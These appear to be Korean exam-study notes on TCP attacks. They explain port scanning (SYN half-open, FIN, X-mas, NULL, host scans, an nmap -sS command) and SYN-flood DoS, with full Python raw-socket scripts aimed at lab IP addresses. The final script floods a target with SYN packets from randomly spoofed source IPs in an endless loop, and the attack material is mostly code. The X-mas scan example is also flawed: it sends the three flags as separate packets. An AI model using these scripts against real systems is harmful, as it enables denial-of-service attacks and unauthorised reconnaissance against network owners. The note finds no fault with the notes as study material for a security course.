L4) TCP 취약점

1. 포트 스캐닝 ( # 사용자체는 불법 )

     

1) FULL scan
     - TCP Session(3-way-handshake)을 맺는 방법
 
 ncat : nc, netcat
  - cat의 네트워크 버전
      session 이 맺어지면 포트가 열려있는 것이라고 알수 있음
      (세션을연결하고데이터를 전달받는 test를 하는데 유용한 방법 중하나)
  
  !단점
  - 로그에 기록이 남는다
  
 2) Half Open scan ( Stealth scan )
     - 세션을 완전히 맺지 않는 방식을 택함
     - 기록에 남지 않는다(시험문제에서만 안남음 / 실제로는 남음)
    

  1) 열려있는 포트번호 사용 
       : SYN  사용

       -->SYN.ACK가 오면 열려있는 포트

from socket import*
import struct
import ip as _ip
import eth as _eth
import tcp as _tcp

def make_chksum(header):

        size=len(header)
        if (size %2) !=0 :
                header=header+b'\x00'
                size=len(header)

        header=struct.unpack('!'+str(size//2)+'H',header)
        chksum=sum(header)

        carry=chksum & 0b_1111_1111_0000_0000_0000_0000
        carry = chksum >> 16
        while carry !=0:
                chksum =chksum & 0b_0000_0000_1111_1111_1111_1111
                chksum =chksum +carry
                carry=chksum & 0b_1111_1111_0000_0000_0000_0000
                carry = chksum >> 16
        chksum =chksum ^ 0b_1111_1111_1111_1111
        return chksum

sock = socket(AF_PACKET,SOCK_RAW)
sock.bind(('eth0',SOCK_RAW))

client_port=3333
server_port=22 #열려 있는 포트 번호 사용 

client_seq=1
server_seq=0

ip=_ip.Ip()
eth=_eth.Eth()
tcp=_tcp.Tcp()

tcp.set_src(client_port)
tcp.set_dst(server_port)
tcp.set_seq(client_seq)
tcp.set_ack(0)
tcp.set_len(20)
tcp.set_flag(2) # SYN flag 보냄 
tcp.set_window(65535)
tcp.set_chksum(0)
tcp.set_dummy(0)

ip.set_ver(4)
ip.set_len(20)
ip.set_total_len(len(tcp.get_header())+20)
ip.set_id(0)
ip.set_type(6)
ip.set_ttl(64)
ip.set_flag(0)
ip.set_offset(0)
ip.set_chksum(0)
ip.set_src('192.168.219.115')
ip.set_dst('192.168.219.130')
ip.set_chksum(make_chksum(ip.get_header()))

len2=struct.pack('!H',len(tcp.get_header()))
pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()

tcp.set_chksum(make_chksum(pseudo))

eth.set_dst('00:0c:29:6e:09:cb')
eth.set_src('00:0c:29:d1:80:e5')
eth.set_type(0x0800)

sock.send(eth.get_header()+ip.get_header()+tcp.get_header())

  

2) 닫혀있는 포트 번호 사용 

               : FIN , X-mas , NULL
               FIN : FIN flag 세팅

>FIN 

from socket import*
import struct
import ip as _ip
import eth as _eth
import tcp as _tcp

def make_chksum(header):

        size=len(header)
        if (size %2) !=0 :
                header=header+b'\x00'
                size=len(header)

        header=struct.unpack('!'+str(size//2)+'H',header)
        chksum=sum(header)

        carry=chksum & 0b_1111_1111_0000_0000_0000_0000
        carry = chksum >> 16
        while carry !=0:
                chksum =chksum & 0b_0000_0000_1111_1111_1111_1111
                chksum =chksum +carry
                carry=chksum & 0b_1111_1111_0000_0000_0000_0000
                carry = chksum >> 16
        chksum =chksum ^ 0b_1111_1111_1111_1111
        return chksum

sock = socket(AF_PACKET,SOCK_RAW)
sock.bind(('eth0',SOCK_RAW))

client_port=3333
server_port=10 # 닫혀 있는 포트 사용 

client_seq=1
server_seq=0

ip=_ip.Ip()
eth=_eth.Eth()
tcp=_tcp.Tcp()

tcp.set_src(client_port)
tcp.set_dst(server_port)
tcp.set_seq(client_seq)
tcp.set_ack(0)
tcp.set_len(20)
tcp.set_flag(1) # FIN flag 
tcp.set_window(65535)
tcp.set_chksum(0)
tcp.set_dummy(0)

ip.set_ver(4)
ip.set_len(20)
ip.set_total_len(len(tcp.get_header())+20)
ip.set_id(0)
ip.set_type(6)
ip.set_ttl(64)
ip.set_flag(0)
ip.set_offset(0)
ip.set_chksum(0)
ip.set_src('192.168.219.115')
ip.set_dst('192.168.219.130')
ip.set_chksum(make_chksum(ip.get_header()))

len2=struct.pack('!H',len(tcp.get_header()))
pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()
tcp.set_chksum(make_chksum(pseudo))

eth.set_dst('00:0c:29:6e:09:cb')
eth.set_src('00:0c:29:d1:80:e5')
eth.set_type(0x0800)

sock.send(eth.get_header()+ip.get_header()+tcp.get_header())

   

   X-mas : 모든 flag를 세팅 FIN,URG,ACK

>X-mas 

from socket import*
import struct
import ip as _ip
import eth as _eth
import tcp as _tcp

def make_chksum(header):

        size=len(header)
        if (size %2) !=0 :
                header=header+b'\x00'
                size=len(header)

        header=struct.unpack('!'+str(size//2)+'H',header)
        chksum=sum(header)

        carry=chksum & 0b_1111_1111_0000_0000_0000_0000
        carry = chksum >> 16
        while carry !=0:
                chksum =chksum & 0b_0000_0000_1111_1111_1111_1111
                chksum =chksum +carry
                carry=chksum & 0b_1111_1111_0000_0000_0000_0000
                carry = chksum >> 16
        chksum =chksum ^ 0b_1111_1111_1111_1111
        return chksum

sock = socket(AF_PACKET,SOCK_RAW)
sock.bind(('eth0',SOCK_RAW))

client_port=3333
server_port=10 # 닫힌 포트번호 

client_seq=1
server_seq=0

#FIN 

ip=_ip.Ip()

eth=_eth.Eth()
tcp=_tcp.Tcp()

tcp.set_src(client_port)
tcp.set_dst(server_port)
tcp.set_seq(client_seq)
tcp.set_ack(0)
tcp.set_len(20)
tcp.set_flag(0b_000_001) #FIN flag
tcp.set_window(65535)
tcp.set_chksum(0)
tcp.set_dummy(0)

ip.set_ver(4)
ip.set_len(20)
ip.set_total_len(len(tcp.get_header())+20)
ip.set_id(0)
ip.set_type(6)
ip.set_ttl(64)
ip.set_flag(0)
ip.set_offset(0)
ip.set_chksum(0)
ip.set_src('192.168.219.115')
ip.set_dst('192.168.219.130')

ip.set_chksum(make_chksum(ip.get_header()))

len2=struct.pack('!H',len(tcp.get_header()))
pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()
tcp.set_chksum(make_chksum(pseudo))

eth.set_dst('00:0c:29:6e:09:cb')
eth.set_src('00:0c:29:d1:80:e5')
eth.set_type(0x0800)

sock.send(eth.get_header()+ip.get_header()+tcp.get_header())

#urgent

ip=_ip.Ip()
eth=_eth.Eth()
tcp=_tcp.Tcp()

tcp.set_src(client_port)
tcp.set_dst(server_port)
tcp.set_seq(client_seq)
tcp.set_ack(0)
tcp.set_len(20)
tcp.set_flag(0b_100_000) #URG flag 
tcp.set_window(65535)
tcp.set_chksum(0)
tcp.set_dummy(0)

ip.set_ver(4)
ip.set_len(20)
ip.set_total_len(len(tcp.get_header())+20)
ip.set_id(0)
ip.set_type(6)
ip.set_ttl(64)
ip.set_flag(0)
ip.set_offset(0)
ip.set_chksum(0)
ip.set_src('192.168.219.115')
ip.set_dst('192.168.219.130')
ip.set_chksum(make_chksum(ip.get_header()))

len2=struct.pack('!H',len(tcp.get_header()))
pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()
tcp.set_chksum(make_chksum(pseudo))

eth.set_dst('00:0c:29:6e:09:cb')
eth.set_src('00:0c:29:d1:80:e5')
eth.set_type(0x0800)

sock.send(eth.get_header()+ip.get_header()+tcp.get_header())

#ack

ip=_ip.Ip()
eth=_eth.Eth()
tcp=_tcp.Tcp()

tcp.set_src(client_port)
tcp.set_dst(server_port)
tcp.set_seq(client_seq)
tcp.set_ack(0)
tcp.set_len(20)
tcp.set_flag(0b_010_000) #ACK flag
tcp.set_window(65535)
tcp.set_chksum(0)
tcp.set_dummy(0)

ip.set_ver(4)
ip.set_len(20)
ip.set_total_len(len(tcp.get_header())+20)
ip.set_id(0)
ip.set_type(6)
ip.set_ttl(64)
ip.set_flag(0)
ip.set_offset(0)
ip.set_chksum(0)
ip.set_src('192.168.219.115')
ip.set_dst('192.168.219.130')
ip.set_chksum(make_chksum(ip.get_header()))

len2=struct.pack('!H',len(tcp.get_header()))
pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()
tcp.set_chksum(make_chksum(pseudo))

eth.set_dst('00:0c:29:6e:09:cb')
eth.set_src('00:0c:29:d1:80:e5')
eth.set_type(0x0800)

sock.send(eth.get_header()+ip.get_header()+tcp.get_header())

   

Null : 모든 flag 를 세팅하지 않음

>Null 

from socket import*
import struct
import ip as _ip
import eth as _eth
import tcp as _tcp

def make_chksum(header):

        size=len(header)
        if (size %2) !=0 :
                header=header+b'\x00'
                size=len(header)

        header=struct.unpack('!'+str(size//2)+'H',header)
        chksum=sum(header)

        carry=chksum & 0b_1111_1111_0000_0000_0000_0000
        carry = chksum >> 16
        while carry !=0:
                chksum =chksum & 0b_0000_0000_1111_1111_1111_1111
                chksum =chksum +carry
                carry=chksum & 0b_1111_1111_0000_0000_0000_0000
                carry = chksum >> 16
        chksum =chksum ^ 0b_1111_1111_1111_1111
        return chksum

sock = socket(AF_PACKET,SOCK_RAW)
sock.bind(('eth0',SOCK_RAW))

client_port=3333

server_port=10 # 닫힌 포트 번호 

client_seq=1
server_seq=0

ip=_ip.Ip()
eth=_eth.Eth()
tcp=_tcp.Tcp()

tcp.set_src(client_port)
tcp.set_dst(server_port)
tcp.set_seq(client_seq)
tcp.set_ack(0)
tcp.set_len(20)
tcp.set_flag(0) # null flag 
tcp.set_window(65535)
tcp.set_chksum(0)
tcp.set_dummy(0)

ip.set_ver(4)
ip.set_len(20)
ip.set_total_len(len(tcp.get_header())+20)
ip.set_id(0)
ip.set_type(6)
ip.set_ttl(64)
ip.set_flag(0)
ip.set_offset(0)
ip.set_chksum(0)
ip.set_src('192.168.219.115')
ip.set_dst('192.168.219.130')
ip.set_chksum(make_chksum(ip.get_header()))

len2=struct.pack('!H',len(tcp.get_header()))
pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()
tcp.set_chksum(make_chksum(pseudo))

eth.set_dst('00:0c:29:6e:09:cb')
eth.set_src('00:0c:29:d1:80:e5')

eth.set_type(0x0800)

sock.send(eth.get_header()+ip.get_header()+tcp.get_header())

 
  3) 호스트 스캔 : SYN/ACK
   --호스트가 살아있으면 무조건 응답이 온다
   ( 포트와 상관없이 )
 

 ##시험문제  :
   nmap 사용법 나옴
   옵션 사용법
  nmap -(옵션) 호스트정보  포트
   
  # nmap -sS 192.168.219.130 -p 1-1000

2. DDos : SYN Flooding
     - 대량의 SYN 패킷을 사용
         SYN-RECV (SYN을 보내고 ACK를 기다리는 것)
        이 많아지면 back-log -Quene의 사이즈를 늘린다 ( 시험문제 )
 
     - 리셋을 받는 거보다 많이 SYN을 보내는 것 
     - IP Spoofing 같이 사용을 함
       ( 출발지 아이피를 속여서 spoofing )
      -Random 아이피 작성

from socket import*
import struct
import ip as _ip
import eth as _eth
import tcp as _tcp
import random
import time

def make_chksum(header):

        size=len(header)
        if (size %2) !=0 :
                header=header+b'\x00'
                size=len(header)

        header=struct.unpack('!'+str(size//2)+'H',header)
        chksum=sum(header)

        carry=chksum & 0b_1111_1111_0000_0000_0000_0000
        carry = chksum >> 16
        while carry !=0:
                chksum =chksum & 0b_0000_0000_1111_1111_1111_1111
                chksum =chksum +carry
                carry=chksum & 0b_1111_1111_0000_0000_0000_0000
                carry = chksum >> 16
        chksum =chksum ^ 0b_1111_1111_1111_1111
        return chksum

sock = socket(AF_PACKET,SOCK_RAW)
sock.bind(('eth0',SOCK_RAW))

ip=_ip.Ip()
eth=_eth.Eth()
tcp=_tcp.Tcp()

while True:

 client_port=3333
 server_port=10000

 client_seq=1
 server_seq=0
 

# ip 를 random 으로 넣어줌 
 a=random.randrange(1,255)
 b=random.randrange(1,255)
 c=random.randrange(1,255)
 d=random.randrange(1,255)
 src='{:d}.{:d}.{:d}.{:d}'.format(a,b,c,d)
 
 tcp.set_src(client_port)
 tcp.set_dst(server_port)
 tcp.set_seq(client_seq)
 tcp.set_ack(0)
 tcp.set_len(20)
 tcp.set_flag(2)
 tcp.set_window(65535)
 tcp.set_chksum(0)
 tcp.set_dummy(0)

 ip.set_ver(4)
 ip.set_len(20)
 ip.set_total_len(len(tcp.get_header())+20)
 ip.set_id(0)
 ip.set_type(6)
 ip.set_ttl(64)
 ip.set_flag(0)
 ip.set_offset(0)
 ip.set_chksum(0)
 ip.set_src(src)
 ip.set_dst('192.168.219.130')

 ip.set_chksum(make_chksum(ip.get_header()))

 len2=struct.pack('!H',len(tcp.get_header()))
 pseudo=ip.src+ip.dst+b'\x00'+ ip.type+len2+tcp.get_header()
 tcp.set_chksum(make_chksum(pseudo))

 eth.set_dst('00:0c:29:6e:09:cb')
 eth.set_src('00:0c:29:d1:80:e5')
 eth.set_type(0x0800)

 sock.send(eth.get_header()+ip.get_header()+tcp.get_header())
 time.sleep(1)

! time.sleep(1)을 걸어주어야함 (과도한 트레픽을 받기 때문)

! 한대의 컴퓨터로 많은 트레픽을 주어야 하므로 ip spoofing을 사용